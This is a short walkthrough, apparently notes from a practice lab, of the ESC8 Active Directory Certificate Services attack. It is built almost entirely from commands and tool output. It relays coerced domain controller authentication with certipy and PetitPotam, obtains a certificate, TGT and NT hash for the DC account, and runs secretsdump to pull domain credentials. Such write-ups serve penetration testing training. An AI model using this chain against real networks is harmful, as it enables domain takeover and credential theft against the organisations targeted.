ESC8 - with certipy
ADCS attack tool certipy to automatise a lots of things.
Let’s do the same attack with certipy, setup the listener :
Install Certipy
sudo pip3 install certipy-ad
sudo certipy relay -ca 192.168.56.23 -template DomainController
execute the coerce just like we did before with petitpotam
python3 PetitPotam.py 192.168.56.31 baltimore.maryland.local
Now we got the certificate so we can get the NT hash of the DC and also the TGT with the command :
sudo certipy auth -pfx baltimore.pfx -dc-ip 192.168.56.12
Certipy v4.3.0 - by Oliver Lyak (ly4k)
[*] Using principal: baltimore$@maryland.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'baltimore.ccache'
[*] Trying to retrieve NT hash for 'baltimore$'
[*] Got hash for 'baltimore$@maryland.local': aad3b435b51404eeaad3b435b51404ee:d06fbfbf20638881486242cfa9827759
export KRB5CCNAME=/home/jefe/ADCS/baltimore.ccache
secretsdump.py -k -no-pass MARYLAND.LOCAL/'baltimore$'@baltimore.maryland.local
# or with the hash
secretsdump.py -hashes ':aad3b435b51404eeaad3b435b51404ee:d06fbfbf20638881486242cfa9827759' -no-pass MARYLAND.LOCAL/'baltimore$'@baltimore.maryland.local
Last updated